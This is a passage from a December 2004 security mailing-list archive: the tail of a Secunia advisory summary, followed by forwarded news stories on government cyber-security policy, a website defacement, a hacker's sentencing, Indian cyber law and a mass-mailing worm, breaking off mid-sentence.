an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13366/ -- [SA13362] Mac OS X Security Update Fixes Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Spoofing, Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2004-12-03 Apple has issued a security update for Mac OS X, which fixes various vulnerabilities. Full Advisory: http://secunia.com/advisories/13362/ -- [SA13380] Debian update for ViewCVS Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2004-12-06 Debian has issued an update for viewcvs. This fixes a vulnerability, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13380/ -- [SA13367] Darwin Streaming Server "DESCRIBE" Request Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2004-12-08 A vulnerability has been reported in Darwin Streaming Server, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13367/ -- [SA13358] Big Medium Unspecified Script Upload Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-02 A vulnerability has been reported in Big Medium, which potentially can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13358/ -- [SA13401] Sun Solaris in.rwhod Unspecified Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-08 A vulnerability has been reported in Sun Solaris, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13401/ -- [SA13371] Debian hpsockd Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-03 infamous41md has reported a vulnerability in hpsockd, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13371/ -- [SA13359] Red Hat update for kernel Critical: Moderately critical Where: From local network Impact: Security Bypass, Privilege escalation, DoS Released: 2004-12-03 Red Hat has issued an update for the kernel. This fixes multiple vulnerabilities, which potentially can be exploited to gain escalated privileges, bypass certain security restrictions, or cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13359/ -- [SA13407] Fedora update for mysql Critical: Less critical Where: From local network Impact: Security Bypass, Privilege escalation, DoS, System access Released: 2004-12-09 Fedora has issued an update for mysql. This fixes multiple vulnerabilities, which can be exploited to perform certain actions on a system with escalated privileges, bypass certain security restrictions, cause a DoS (Denial of Service), or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13407/ -- [SA13403] Debian update for nfs-utils Critical: Less critical Where: From local network Impact: DoS Released: 2004-12-09 Debian has issued an update for nfs-utils. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13403/ -- [SA13390] Mandrake update for nfs-utils Critical: Less critical Where: From local network Impact: DoS Released: 2004-12-07 MandrakeSoft has issued an update for nfs-utils. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13390/ -- [SA13384] nfs-utils "SIGPIPE" TCP Connection Termination Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2004-12-07 SGI has reported a vulnerability in nfs-utils, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13384/ -- [SA13405] rootsh Escape Sequences Logging Security Bypass Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-09 A security issue has been reported in rootsh, which can be exploited by malicious, local users to bypass the logging functionality. Full Advisory: http://secunia.com/advisories/13405/ -- [SA13392] Gentoo mirrorselect Insecure Temporary File Creation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-07 Ervin Nemeth has reported a vulnerability in mirrorselect, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13392/ -- [SA13388] Gentoo update for perl Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-07 Gentoo has issued an update for perl. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13388/ -- [SA13387] Mandrake update for gzip Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-07 MandrakeSoft has issued an update for gzip. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13387/ -- [SA13385] Mandrake update for lvm Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-07 MandrakeSoft has issued an update for lvm. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13385/ -- [SA13383] Mandrake update for openssl Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-07 MandrakeSoft has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13383/ -- [SA13379] Gentoo rssh Arbitrary Command Execution Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-06 Gentoo has acknowledged a vulnerability in rssh, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13379/ -- [SA13376] file Unspecified ELF Header Parsing Vulnerability Critical: Less critical Where: Local system Impact: Unknown Released: 2004-12-06 A vulnerability with an unknown impact has been reported in file. Full Advisory: http://secunia.com/advisories/13376/ -- [SA13370] AIX Unspecified System Startup Scripts Vulnerability Critical: Less critical Where: Local system Impact: Manipulation of data, DoS Released: 2004-12-03 A vulnerability has been reported in AIX, which can be exploited by malicious, local users to inject arbitrary data into the ODM (Object Data Manager) or cause a vulnerable system to hang during boot. Full Advisory: http://secunia.com/advisories/13370/ -- [SA13369] Gentoo update for scponly Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-06 Gentoo has issued an update for scponly. This fixes a vulnerability, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13369/ -- [SA13364] scponly Security Bypass Arbitrary Command Execution Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-03 Jason Wies has reported a vulnerability in scponly, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13364/ -- [SA13363] rssh Security Bypass Arbitrary Command Execution Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-03 Jason Wies has reported a vulnerability in rssh, which can be exploited to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13363/ Other: Cross Platform:-- [SA13402] Netscape Window Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Spoofing Released: 2004-12-08 A vulnerability has been reported in Netscape, which can be exploited by malicious people to spoof the content of websites. Full Advisory: http://secunia.com/advisories/13402/ -- [SA13400] WebLibs Directory Traversal Vulnerability Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2004-12-08 John Bissell has reported a vulnerability in WebLibs, which can be exploited by malicious people to access sensitive information. Full Advisory: http://secunia.com/advisories/13400/ -- [SA13375] ViewCVS Restricted Directory Access Security Bypass Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2004-12-06 Hajvan Sehic has reported a vulnerability in ViewCVS, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13375/ -- [SA13397] MaxDB Web Tools Buffer Overflow and Denial of Service Vulnerabilities Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-08 Evgeny Demidov has reported two vulnerabilities in MaxDB, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13397/ -- [SA13393] Codestriker Unspecified Repository Security Bypass Issue Critical: Less critical Where: From remote Impact: Security Bypass Released: 2004-12-08 A security issue has been reported in Codestriker, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13393/ -- [SA13360] Jakarta Lucene "results.jsp" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-03 A vulnerability has been reported in Jakarta Lucene, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13360/ -- [SA13357] Serendipity "searchTerm" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-02 Stefan Esser has reported a vulnerability in Serendipity, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13357/ -- [SA13377] Novell NetMail Default NMAP Authentication Credential Security Issue Critical: Less critical Where: From local network Impact: Manipulation of data, Exposure of system information, Exposure of sensitive information Released: 2004-12-06 A security issue has been reported in NetMail, which can be exploited by malicious people to access the mail store. Full Advisory: http://secunia.com/advisories/13377/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 ======================================================================== From isn at c4i.org Fri Dec 10 05:38:16 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:16 2004 Subject: [ISN] CodeCon CFP deadline nearing Message-ID: Forwarded from: Len Sassaman CodeCon 4.0 February 11-13, 2005 San Francisco CA, USA www.codecon.org Call For Papers CodeCon is the premier showcase of cutting edge software development. It is an excellent opportunity for programmers to demonstrate their work and keep abreast of what's going on in their community. All presentations must include working demonstrations, ideally accompanied by source code. Presenters must be done by one of the active developers of the code in question. We emphasize that demonstrations be of *working* code. We hereby solicit papers and demonstrations. * Papers and proposals due: December 15, 2004 * Authors notified: January 1, 2005 Possible topics include, but are by no means restricted to: * community-based web sites - forums, weblogs, personals * development tools - languages, debuggers, version control * file sharing systems - swarming distribution, distributed search * security products - mail encryption, intrusion detection, firewalls Presentations will be a 45 minutes long, with 15 minutes allocated for Q&A. Overruns will be truncated. Submission details: Submissions are being accepted immediately. Acceptance dates are November 15, and December 15. After the first acceptance date, submissions will be either accepted, rejected, or deferred to the second acceptance date. The conference language is English. Ideally, demonstrations should be usable by attendees with 802.11b connected devices either via a web interface, or locally on Windows, UNIX-like, or MacOS platforms. Cross-platform applications are most desirable. Our venue will be 21+. To submit, send mail to submissions-2005@codecon.org including the following information: * Project name * url of project home page * tagline - one sentence or less summing up what the project does * names of presenter(s) and urls of their home pages, if they have any * one-paragraph bios of presenters, optional, under 100 words each * project history, under 150 words * what will be done in the project demo, under 200 words * slides to be shown during the presentation, if applicable * future plans General Chairs: Jonathan Moore, Len Sassaman Program Chair: Bram Cohen Program Committee: * Jeremy Bornstein, AtomShockwave Corp., USA * Bram Cohen, BitTorrent, USA * Jered Floyd, Permabit, USA * Ian Goldberg, Zero-Knowledge Systems, CA * Dan Kaminsky, Avaya, USA * Klaus Kursawe, Katholieke Universiteit Leuven, BE * Ben Laurie, A.L. Digital Ltd., UK * David Molnar, University of California, Berkeley, USA * Jonathan Moore, Mosuki, USA * Len Sassaman, Nomen Abditum Services, USA Sponsorship: If your organization is interested in sponsoring CodeCon, we would love to hear from you. In particular, we are looking for sponsors for social meals and parties on any of the three days of the conference, as well as sponsors of the conference as a whole and donors of door prizes. If you might be interested in sponsoring any of these aspects, please contact the conference organizers at codecon-admin@codecon.org. Press policy: CodeCon provides a limited number of passes to bona fide press. Complimentary press passes will be evaluated on request. Everyone is welcome to pay the low registration fee to attend without an official press credential. Questions: If you have questions about CodeCon, or would like to contact the organizers, please mail codecon-admin@codecon.org. Please note this address is only for questions and administrative requests, and not for workshop presentation submissions. From isn at c4i.org Fri Dec 10 05:38:35 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:18 2004 Subject: [ISN] DOI averts online shutdown Message-ID: http://www.nwfusion.com/news/2004/1209doi.html By John Fontana Network World Fusion 12/09/04 Three years after a judge's ruling in a class-action lawsuit unplugged the Department of Interior and its eight agencies from the Internet for four chaotic months, the department is still fighting to stay online having averted its third ordered shutdown earlier this month. Since the chaos of 2001, the DOI has invested millions to improve computer security, a trend, observers say, is cutting across federal government. The latest DOI Internet blackout was avoided when the U.S. Court of Appeals for the D.C. Circuit ruled on Dec. 3 that U.S. District Judge Royce Lamberth ignored evidence showing the DOI had addressed his concerns over computer security. Those concerns are part of an eight-year-old class action lawsuit, Cobell vs. Norton, over the mismanagement of Indian trust funds filed by 300,000 Native Americans against the DOI, which oversees the Bureau of Indian Affairs (BIA). Lamberth ordered the shutdown in March 2004, which put the DOI offline for several days before a stay was granted. The Dec. 3 ruling overturned Lamberth's order. The Internet shutdowns all started in December 2001, when Lamberth ruled that the government breached its trust obligations resulting in accounting errors for some $10 billion owed to Native Americans and he ordered an overhaul of DOI systems. The BIA systems were so bad that the DOI could not determine which systems housed Indian trust data and DOI was ordered to take all eight agencies offline, bringing four months of chaos that showed just how entrenched the Internet had become in the day-to-day life of the government. Ironically, those hurt worst were Native Americans, who went without their existing trust payments as systems were hogtied. To this day, the BIA remains disconnected from the Internet pending a settlement. But the DOI's other seven agencies are all back up and online, including the Minerals Management Service, Bureau of Land Management, the Fish and Wildlife Service, the Office of Surface Mining and the National Park Service. And the DOI is busy working on its computer security. In the past two years, the BIA has allocated more than $50 million to overhaul its computer systems and network including firewalls and other security software, according to the DOI, including a new IT center in suburban Washington, D.C. Dave Anderson, who took over as head of the BIA earlier this year, said during a February tour he conducted for tribal leaders that the facility's network is the "most sophisticated" within the DOI. "The department has made significant investment in IT security," says Dan DuBray, acting press secretary for the DOI. "Those investments have provided multiple hardening of these systems that house Indian trust data." DuBray says the DOI believes that the data in question is now among the most secure in the federal government. He declined to provide details on the security measures deployed. But experts say the federal government in general is working to harden its computer systems especially in light of the Federal Information Security Management Act, which was enacted in 2002 and ties funding for federal information technology projects to security compliance, and the Sept. 11 attacks. "Those agencies involved in national security have spent billions of dollars with a focus on information security," says Ray Bjorklund, senior vice president and chief knowledge officer for Federal Sources, a research firm focused on public sector IT. "The civil agencies are putting more energy into bolstering information security. It is hard to put an exact dollar amount on these things, but they are spending billions of dollars per year on security." From isn at c4i.org Fri Dec 10 05:39:19 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:20 2004 Subject: [ISN] Cyber Security's Cassandra Syndrome Message-ID: http://www.technologyreview.com/articles/04/12/wo_hellweg121004.asp?p=1 By Eric Hellweg December 10, 2004 The big news surrounding the passage of the Intelligence Reform Act this week was the creation of a new, top-level intelligence director position, which will oversee all aspects of intelligence gathering and dissemination in the U.S. government. But the technology community was calling foul at the elimination of another proposed high-level post. During last minute, "mercurial" conference sessions, a provision that would have created an assistant secretary of cyber security within the Department of Homeland Security (DHS) was eliminated. "The executive branch must exert more leadership" in this area, says a statement issued this week by the Cyber Security Industry Alliance, a Washington-based lobbying group. Many hoped the post would help end the musical chairs nature of the current cyber security director position, which has been a problem since the Bush administration took office in 2000. President George W. Bush appointed Richard C. Clarke to be the nation's first cyber security "Czar", but he resigned in frustration in February 2003. He was followed by Howard Schmidt, now the chief security officer at eBay, who also quit after two months. Most recently, the position was held by Amit Yoran, a former Symantec executive. But by then the position was a part of the DHS, and Yoran, reportedly frustrated by the lack of attention given to the issue, resigned in October after just one year. No one doubts the necessity of protecting the nation?s airports and infrastructure, but the topic doesn't require a senior-level post says the Bush administration and the DHS, which requested the excision, according to Harris Miller, president of the Information Technology Association of America (ITAA). "We're still examining respective options for reorganization," says Katie Mynster, a spokesperson for DHS." [But] regarding that position specifically, we continue to believe that the integration of physical and cyber security within the Infrastructure Protection Directorate is the best method to protect the nation?s infrastructure." Security observers fear that with the elimination of the assistant secretary proposal, cyber security could slip further down the mindshare and budget priority list. Miller says that because the assistant secretary position is a political appointee-level post, requiring congressional approval hearings, it carries far more heft than the current staffing level. But there's a more practical consideration as well, Miller says. The assistant secretary position is two people removed from the president's ear, instead of the five that exist now. "Unless you're a senior person, it's tough to meet other senior people. It's harder to get face time," says Miller. "Washington is all about clout, real and perceived." Technology industry organizations on the hill that opposed the position's elimination fear that without a senior-level person pushing for budgets and awareness, the nation risks a critical infrastructure attack, one that could cost multiple billions of dollars and possibly lives. Right now, much of the discussion around cyber security involves hackers shutting down websites and stealing personal information. But with networked sensors and software-based operations at our nation's power plants, petroleum refineries, and other critical locations, cyber-security proponents fear that someone might try to gain access to these points as part of a larger, coordinated attack with terrorism -- not hacker hijinx -- as a motive. Further complicating the issue is the wide variance in security awareness among different industries and sectors. The finance industry, for example, is very much attuned to the issue of cyber security, whereas the agriculture, energy, and education sectors either don't have the budget or don't think the topic is a problem. Proponents say government-led initiatives, shepherded by an assistant secretary-level position, could help educate industries and the public, and work to protect against cyber attacks. "The message the Department of Homeland Security is sending is that cyber security just isn't that high of a priority," says Miller. From isn at c4i.org Fri Dec 10 05:39:33 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:21 2004 Subject: [ISN] School's out to shun IE Message-ID: http://news.zdnet.com/2100-1009_22-5485834.html By Jim Hu CNET News.com December 9, 2004 Citing security risks, a state university is urging students to drop Internet Explorer in favor of alternative Web browsers such as Firefox and Safari. In a notice sent to students on Wednesday, Pennsylvania State University's Information Technology Services department recommended that students download other browsers to reduce attacks through vulnerabilities in the Microsoft software. The university said "media reports" and a string of warnings by Carnegie Mellon University's Computer Emergency and Response Team led to its recommendation. "We're not telling people to wipe off IE, because you need IE to do operating-system updates," Robin Anderson, a spokeswoman for Penn State's ITS department, said in an interview. "We're telling (students) there are alternatives--and for them to strongly look at those." Microsoft said Internet users have a choice in Web browsers, adding that the company has invested heavily in online security. "While Internet Explorer is the choice of hundreds of millions because of the unique value it provides, we respect that some customers will choose an alternative," a Microsoft representative wrote in an e-mail statement. Penn State's new policy highlights the many security vulnerabilities that have dogged IE over the past few months. Nearly two dozen holes in the Web browser have been discovered during the fall, ranging in degrees of seriousness. Malicious code writers have targeted security holes in the browser to launch attacks or install spyware. These attacks are often launched when a victim clicks on a specific Web link, opening the door for criminals to take over the person's computer. Once the PC is compromised, the attacker could access account information, load other software and delete files. Other attackers have targeted IE vulnerabilities to launch viruses. In November, security researchers discovered two viruses, Bofra.A and Bofra.B, loosely based on the MyDoom source code. Security concerns have prompted a growing number of Internet users to embrace different browsers, such as The Mozilla Organization's Firefox, Apple Computer's Safari and Opera Software's Opera. While IE remains the undisputed leader for browsers, with nearly 90 percent market share, Firefox continues to gain in popularity. Firefox has surpassed the 5 million download mark while gaining 5 percentage points in May to 7.4 percent, according to research firm OneStat.com. Microsoft has disputed these numbers, claiming that they do not represent corporate users. Even though attackers target IE because of its near ubiquity, malicious code writers are widening their reach. Yesterday, a security company discovered an exploit in a feature common to most browsers, including IE, Firefox, Opera and Safari, that could be used to launch an attack. Penn State's Anderson said the university has just completed a two-month information campaign for PC security, urging students to download firewalls and antivirus software, and to regularly install operating-system updates. She added that changing browsers is one of many ways to defend against attackers. "What we're saying is, we're taking a hard stance on securing our computers," Anderson said. CNET News.com's Robert Lemos contributed to this report. From isn at c4i.org Fri Dec 10 05:39:48 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:23 2004 Subject: [ISN] Japan to step up defenses against Islamic, NKorean, computer threats Message-ID: Forwarded from: William Knowles http://www.spacedaily.com/2004/041208055632.1zik2pci.html Dec 08, 2004 - (AFP) TOKYO - Japan will set up a special unit against cyber terrorism and needs to be on guard against threats from Islamic militants and North Korean agents, police said Wednesday. The government will set up a new anti-cyberterrorism team of about 30 computer experts by April, with the number of personnel to be doubled two years later, said an official with the IT Security Office of the Cabinet Office. "Various acts of terrorism and attacks are on the rise, and the government has decided we can do more to deal with them," the official said. The National Police Agency said separately that Japan, a close ally of the United States, needed to be cautious about threats from Islamic extremists and North Korea. Militants purported to belong to Al-Qaeda have threatened to attack Tokyo to protest Japan's troop deployment to Iraq. North Korea during the Cold War kidnapped Japanese citizens to train spies in Japanese language and culture, a saga that continues to keep relations tense between the two countries. In an annual review and outlook of public security released Tuesday, the police cited the case of Lionel Dumont, a Frenchman linked to Al-Qaeda who stayed in Japan with several foreign associates after the September 11, 2001 attacks in the United States. "Concerns remain that extremists might manipulate the Islamic communities (in Japan) to carry out terror-related activities," the report said. At most 10,000 Japanese are estimated to be Muslims, mostly women who converted after marrying foreigners, but Japan is home to many more expatriate Muslims. On North Korea, the police report said the Stalinist nation has widened the gap with the rest of the world with its nuclear ambition. "In order to secure economic aid from Japan, (North Korea) might increase harmful operations and activities," the report said. *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Fri Dec 10 05:43:57 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 10 05:56:26 2004 Subject: [ISN] Hacker Gets 16 Months In Prison Message-ID: http://www.nbcsandiego.com/news/3987070/detail.html December 9, 2004 SAN DIEGO -- An Arizona man who hacked into business computer e-mail systems, then stole mortgage refinance leads that he resold for personal profit, was sentenced Thursday to 16 months in state prison. Anthony Todd Banasack, 38, pleaded guilty last month to a felony charge of accessing a computer to take data. Banasack was sentenced by Superior Court Judge Robert Trentacosta. "The defendant victimized companies or individuals over a two- to three- year period using keystroke logging software that had been secretly installed on computers from a remote location," said District Attorney Bonnie Dumanis. In May, a San Diego company detected keystroke logging software, in which everything typed on its computer keyboards could be replicated off site by the hacker. The district attorney's Computer and Technology Crime High Tech Response Team and a sheriff's detective identified Banasack, who lived in Tempe, Ariz., as the suspect, authorities said. Subsequent investigation by the CATCH Team determined that Banasack had victimized eight corporations in California, authorities said. More than 6,000 data files stolen from victims' computers were recovered from Banasack's computers, investigators said. From isn at c4i.org Mon Dec 13 04:53:08 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 13 05:13:39 2004 Subject: [ISN] Hackers deface county Web site Message-ID: http://www.themonitor.com/SiteProcessor.cfm?Template=/GlobalTemplates/Details.cfm&StoryID=4697&Section=Local December 11,2004 Alma Walzer The Monitor EDINBURG - The official Hidalgo County Web site fell victim last weekend to an international computer hacking group known by the names of Dead_c0 de and Kernel_Attack, believed to be based in Brazil. The hackers defaced the county's main page on or about Dec. 5 and posted an obscene message directed at President George W. Bush, Osama bin Laden, Saddam Hussein and the United States of America. Using Portuguese and English, the group said "we are not kiddies, nor are we nerds, much less hackers," according to the message on the Web site's main page. "Kernel_Attack ownZ you." It is not known exactly how long the message remained on the county Web site, said county information technology director Renan Ramirez. "Once we noticed it on Sunday night, about 10 p.m., we fixed it right away," Ramirez said. "They creamed the main page and replaced it with a "You've been hacked page." "It didn't affect functionality, all we had to do was repair the main page," Ramirez said. "By Monday morning, we were already posting jobs and we really didn't even consider it a very big deal until we read the message and realized it slandered the president." The county's Web site doesn't have transactional capabilities, therefore, there was no real threat to data, Ramirez said. "We have hack attacks all the time," Ramirez said. "The Web site allows the public to view the county phone directory, job postings the commissioners court agenda and provides links to related sites. No county data was compromised." Hidalgo County is not alone. A similar message appeared Friday on a Texas Southern University Web site. The Department of Transportation Studies at TSU, located in Houston, bore the same message without the obscenities to Bush, bin Laden, Hussein and the United States. A news service in the Philippines reported that the Philippine Airlines Web site was hacked by a group that left the same signature line "Kernel_Attack ownZ you " in November. The site used by air travelers to reserve flights with their credit cards was crippled for days. Ramirez said he's required by county policy to report the issue to the proper authorities. The proper authorities include the FBI and the Secret Service. Rosalie Savage, spokeswoman for the McAllen bureau of the FBI, said she personally wasn't familiar with Dead_C0 de or Kernel_Attack. The FBI's San Antonio office has a cyber crime squad that would investigate the situation, Savage said. "If it's valid information then FBI would look at it - and the Secret Service as well, not just us," Savage said. Meanwhile, Ramirez is working hard to make sure the Web site isn't compromised again. "We got approval on some requested equipment for next year," Ramirez said. "We are specifically targeting these threats and getting some detection equipment and a secondary firewall, and we're changing the service provider. "There are five or six different steps we're taking to prevent this from happening again," Ramirez said. Ramirez could have his work cut out for him, as no system is ever considered 100 percent secure. "Nothing is perfect," said Martin Streicher, editor in chief of Linux Magazine. Linux is a computer operating system similar to Windows. The hacker's message made a reference to Linuxmail.org. "There are varying levels of vulnerability depending on what kind of computer you use - its more of a software problem, but there are some hardware problems as well." Streicher pointed to previous cases of "war driving" in San Francisco, Calif., where individuals drive around with laptops and wireless internet access, looking for systems which are unsecure. "Effectively, they open to door to anyone who wants to come in," Streicher said. "There are tons of well known vulnerabilities in Windows. Your Web server alone lets them know what your system is vulnerable to," Streicher said. From isn at c4i.org Mon Dec 13 04:53:34 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 13 05:13:41 2004 Subject: [ISN] Information security: a legal perspective Message-ID: http://www.financialexpress.com/fe_full_story.php?content_id=76698 PAVAN DUGGAL December 13, 2004 Security is one of the biggest concerns that affects the world today, not only in the actual world but in the context of the electronic format and the information stored therein. There is an increasing emphasis on legal issues concerning information security. India enacted its first cyber law, namely the Information Technology Act, 2000 which came into force on October 17, 2000. A perusal of the preamble of the same clearly shows that this is not a law dedicated to security. However, one of the main objectives of the IT Act, 2000 is to provide legal recognition for "electronic commerce", which involves the use of alternatives to paper-based methods of communication and storage of information. Security is thus covered in some measure under IT Act, 2000. The definitional clause of the Indian cyber laws does not define security. However, it defines secure system and security procedure and a secure electronic record. The Indian cyber law also details secure digital signatures. It makes breach of security an act that attracts consequences of civil liability. If a person without the permission of the owner or any other person in charge of a computer, computer system or computer network, accesses or secures access to the same, he will be liable to pay statutory damages by way of compensation, not exceeding Rs 1 crore. Thus, merely gaining access to such a computer or system by breaching or violating the security processes or mechanisms is enough to attract civil liability. Breach of security is also implicitly recognised as a penal offence, as hacking is punishable under Section 66 of the IT Act, 2000 with three years imprisonment and a fine of Rs 2 lakh. The appropriate government has been given the discretion to declare any computer as a protected system. Any person who secures access or attempts to secure access to a protected system in contravention of the provisions of the law, shall be punished with imprisonment of either description for a term which may extended to ten years and shall be liable to fine. As per amendments made in the Indian Evidence Act, 1872 by the IT Act, in any proceedings involving a secure electronic record, the court shall presume, unless contrary is proved, that the secure electronic record has not been altered since the specific point of time, to which the secure status relates. Also, in any proceedings involving secure digital signatures the court shall presume unless the contrary is proved that the secure digital signature is affixed by the subscriber with the intention of signing or approving the electronic record. Some issues of security relating to certifying authorities have been specified in the IT (Certifying Authorities) Rules, 2000 and the IT security guidelines. These guidelines are pretty exhaustive and detail different aspects of physical and operational security and information management including sensitive information security, system integrity and security measures. In conclusion, I am of the opinion that the legal issues relating to security are likely to develop over a period of time as the law on security of information and networks evolves to keep pace with the developments on the technological front. It is the responsibility of each computer user to ensure that the security of computers, computer systems and computer networks is preserved and not violated. Only in preservation of security of the same lies the path of progress and prosperity. The author is a Supreme Court advocate and cyber law consultant. He can be reached at pduggal@nde.vsnl.net.in and pavanduggal@hotmail.com. From isn at c4i.org Mon Dec 13 04:54:51 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 13 05:13:43 2004 Subject: [ISN] DOD organizes network command Message-ID: Forwarded from: William Knowles http://www.fcw.com/fcw/articles/2004/1206/web-dod-12-10-04.asp By Frank Tiboni Dec. 10, 2004 The nation's top cyberwarrior announced today that officials formed a new command structure to better operate and protect the military's computer networks. "It's commanders working with commanders," said Air Force Lt. Gen. Harry Raduege, commander of the task force. He spoke today at a luncheon sponsored by the Northern Virginia chapter of AFCEA International. Defense Department officials approved Nov. 19 the Global Information Grid Network Operations and Defense plan that identifies four officials in the military services that will report to the commander of the Joint Task Force-Global Network Operations. The military services' commanders who will work with Raduege to achieve a better structure and discipline for operation and protection of the military's networks include Army Lt. Gen. Larry Dodgen, commanding general of Army Space and Missile Defense Command; Air Force Lt. Gen. Bruce Carlson, the service's component commander to Strategic Command; Navy Vice Adm. James McArthur Jr., commander of Naval Network Warfare Command; and Marine Corps Col. Robert Baker, the Marines' chief information officer. DOD Secretary Donald Rumsfeld created the task force in June and named the director of the Defense Information Systems Agency to oversee it to achieve a more cohesive operation and protection of the military's networks. Raduege started serving as the agency's director in 2000 and this week agreed to oversee it for two more years. Raduege needed a command structure to better operate and protect the military's networks because they increasingly come under attack. He said task force officials reported 62,810 attempted intrusions to date this year, up from 54,488 in 2003. Raduege also revealed that military networks were hacked 294 times in 2003. He said military employees could prevent 90 percent of the attacks if they practice better computer security to include using unique passwords and heed advice from the military's information assurance bulletins. The task force falls under Strategic Command, one of the military's nine unified combatant commands that either oversee use of combat forces in a geographic region or provide a capability and develop doctrine for them. Strategic Command oversees the operation and protection of the military's networks and information operations to include psychological operations and perhaps computer network attack. *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Mon Dec 13 04:56:33 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 13 05:13:45 2004 Subject: [ISN] 'Playboy' Virus Dropping Dangerous Backdoor Message-ID: http://www.eweek.com/article2/0,1759,1738912,00.asp By Ryan Naraine December 10, 2004 Anti-virus vendors have raised the alarm for a new mass-mailing worm with a dangerous backdoor component. The worm, called W32.Maslan.C@mm, arrives as an attachment promising naked photos of Playboy models but, if executed, drops an IRC (Inter Relay Chat) bot capable of transmitting passwords and sensitive information back to the virus writer. According to an alert from McAfee, the backdoor is powerful enough to terminate the processes of various anti-virus security applications. The worm also spreads itself via poorly secured network shares and weak passwords and takes advantage of two known exploits?LSASS and RPC-DCOM?affecting Microsoft Windows users. Patches for both exploits have been available for some time, but unpatched machines are vulnerable to worm infection. According to Sophos, Maslan-C copies itself to the Windows system folder and creates a number of other files on the 